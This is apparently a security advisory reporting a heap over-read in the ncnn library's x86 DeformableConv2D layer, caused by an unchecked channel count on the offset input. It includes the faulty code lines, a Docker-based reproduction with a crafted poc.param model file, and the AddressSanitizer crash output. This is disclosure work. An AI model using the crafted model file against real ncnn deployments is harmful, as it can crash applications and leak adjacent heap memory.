Heap Over-Read in DeformableConv2D
Affected commit: 5e66f094bf7c597b4569cc014a8be84104748678
Sink: src/layer/x86/deformableconv2d_packed.h:75 in DeformableConv2D_x86::forward
Sanitizer verdict: heap-buffer-overflow
The observed crash lands in src/layer/x86/deformableconv2d_x86.cpp:509, which is the ISA-specialised copy of the reported code path.
Summary
A crafted ncnn model that declares a DeformableConv2D layer whose offset input carries fewer channels than the kernel requires makes the x86 DeformableConv2D kernel read past the end of the offset tensor allocation, aborting the process under ASan and otherwise mixing adjacent heap bytes into the sampling coordinates. The entry point in this PoC is ncnnoptimize, which runs a full Extractor::extract() shape-inference pass over the attacker's graph (ModelWriter::shape_inference()), but any ncnn::Net consumer that loads and runs the .param/.bin pair reaches the same code. The attacker supplies only the two text/binary model files; no weights are needed.
Detail
DeformableConv2D takes the sampling offsets as its second input blob. The layer's contract is that this blob has 2 * kernel_h * kernel_w channels: one channel for the vertical offset and one for the horizontal offset of every kernel tap. That shape is never asserted. DeformableConv2D::load_param() reads num_output, kernel_w/kernel_h, dilation_*, stride_* and pad_* from the .param line and stores them unchecked, and DeformableConv2D_x86::forward() (src/layer/x86/deformableconv2d_x86.cpp:196-229) picks up bottom_blobs[1] as offset without looking at offset.c at all. The channel count of that blob is entirely attacker-controlled: in the PoC it comes straight from the Input offset 0 1 offset 0=5 1=5 2=1 line, i.e. a 5x5x1 tensor.
Both code paths in the layer index the offset tensor by a kernel-derived channel number. The non-sgemm packed path indexes offset directly; the use_sgemm_convolution path first repacks it to offset_unpacked (convert_packing(offset, offset_unpacked, 1, opt) — a no-op shallow copy when the blob is already unpacked) and then indexes that. Neither clamps the channel index against the actual channel count:
// src/layer/x86/deformableconv2d_packed.h:72
if (offset_not_pack)
{
offset_h = offset.channel((i * kernel_w + j) * 2).row(h_col)[w_col];
offset_w = offset.channel((i * kernel_w + j) * 2 + 1).row(h_col)[w_col];
}
// src/layer/x86/deformableconv2d_x86.cpp:500
const Mat offset_h_k = offset_unpacked.channel((u * kernel_w + v) * 2);
const Mat offset_w_k = offset_unpacked.channel((u * kernel_w + v) * 2 + 1);
// src/layer/x86/deformableconv2d_x86.cpp:508
float offset_h = offset_h_k.row(i)[j];
float offset_w = offset_w_k.row(i)[j];
With the PoC's 0=1 1=1 (a 1x1 kernel) the loop runs once with u = v = 0, so it requests channel 0 and channel 1 — but the offset blob has exactly one channel. Mat::channel(1) is pure pointer arithmetic: data + cstep * elemsize. For the 5x5x1 float blob created by ModelWriter::shape_inference() (tools/modelwriter.h:390), cstep = alignSize(5*5*4, 16) / 4 = 28, so channel(1) starts 112 bytes into a buffer whose real payload is only the 100 bytes of channel 0. The whole allocation is 180 bytes (112 payload + 4 refcount + the 64-byte NCNN_MALLOC_OVERREAD pad), so the first reads out of channel 1 land silently in that pad; the read at row 3, column 2 computes 112 + 3*20 + 2*4 = 180 and steps off the end of the allocation, which is where AddressSanitizer stops the process.
Reproduce
Build and run (writes the Dockerfile, builds ncnn with ASan, runs the PoC)
mkdir -p ncnn-poc-heap-over-read-in-deformableconv2d && cd ncnn-poc-heap-over-read-in-deformableconv2d
cat > Dockerfile <<'DOCKERFILE'
FROM ubuntu:24.04
RUN apt-get update && apt-get install -y --no-install-recommends \
git ca-certificates g++ cmake make python3 python3-pip python3-numpy \
protobuf-compiler libprotobuf-dev \
&& pip3 install --no-cache-dir --break-system-packages onnx protobuf \
&& rm -rf /var/lib/apt/lists/*
RUN git clone --depth 1 https://github.com/Tencent/ncnn.git /ncnn
WORKDIR /ncnn
RUN cmake -S . -B build \
-DCMAKE_BUILD_TYPE=Debug \
-DCMAKE_C_FLAGS="-O0 -g -fsanitize=address" \
-DCMAKE_CXX_FLAGS="-O0 -g -fsanitize=address" \
-DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" \
-DNCNN_BUILD_TOOLS=ON -DNCNN_BUILD_EXAMPLES=ON -DNCNN_BUILD_BENCHMARK=ON \
-DNCNN_BUILD_TESTS=OFF -DNCNN_VULKAN=OFF -DNCNN_OPENMP=OFF \
&& cmake --build build -j"$(nproc)"
ENV ASAN_OPTIONS=detect_leaks=0
WORKDIR /poc
DOCKERFILE
cat > poc.param <<'PARAM'
7767517
3 3
Input data 0 1 data 0=5 1=5 2=1
Input offset 0 1 offset 0=5 1=5 2=1
DeformableConv2D deform 2 1 data offset out 0=1 1=1 6=1
PARAM
docker build -t ncnn-asan .
docker run --rm --network none -v "$PWD:/poc" ncnn-asan \
/ncnn/build/tools/ncnnoptimize poc.param null out.param out.bin 0
AddressSanitizer output:
shape_inference
=================================================================
==1==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x511000000874 at pc 0x5806a41b1e8e bp 0x7ffc4e67c070 sp 0x7ffc4e67c060
READ of size 4 at 0x511000000874 thread T0
#0 0x5806a41b1e8d in ncnn::DeformableConv2D_x86_avx512::forward(std::vector<ncnn::Mat, std::allocator<ncnn::Mat> > const&, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/build/src/layer/x86/deformableconv2d_x86_avx512.cpp:509
#1 0x58069b64f70b in ncnn::NetPrivate::do_forward_layer(ncnn::Layer const*, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:856
#2 0x58069b637b7f in ncnn::NetPrivate::forward_layer(int, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:167
#3 0x58069b6979e9 in ncnn::Extractor::extract(int, ncnn::Mat&, int) /ncnn/src/net.cpp:2939
#4 0x58069b5293c0 in ModelWriter::shape_inference() /ncnn/tools/modelwriter.h:435
#5 0x58069b5a6eee in main /ncnn/tools/ncnnoptimize.cpp:2844
#6 0x78df14b3b1c9 (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#7 0x78df14b3b28a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#8 0x58069b526624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)
0x511000000874 is located 0 bytes after 180-byte region [0x5110000007c0,0x511000000874)
allocated by thread T0 here:
#0 0x78df151b4f1d in posix_memalign ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145
#1 0x58069b5f792d in fastMalloc /ncnn/src/allocator.h:62
#2 0x58069b5f792d in ncnn::Mat::create(int, int, int, unsigned long, ncnn::Allocator*) /ncnn/src/mat.cpp:415
#3 0x58069b527ca0 in ModelWriter::shape_inference() /ncnn/tools/modelwriter.h:390
#4 0x58069b5a6eee in main /ncnn/tools/ncnnoptimize.cpp:2844
#5 0x78df14b3b1c9 (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#6 0x78df14b3b28a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#7 0x58069b526624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)
SUMMARY: AddressSanitizer: heap-buffer-overflow /ncnn/build/src/layer/x86/deformableconv2d_x86_avx512.cpp:509 in ncnn::DeformableConv2D_x86_avx512::forward(std::vector<ncnn::Mat, std::allocator<ncnn::Mat> > const&, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const
Credit
Zheng Yu @ DepthFirst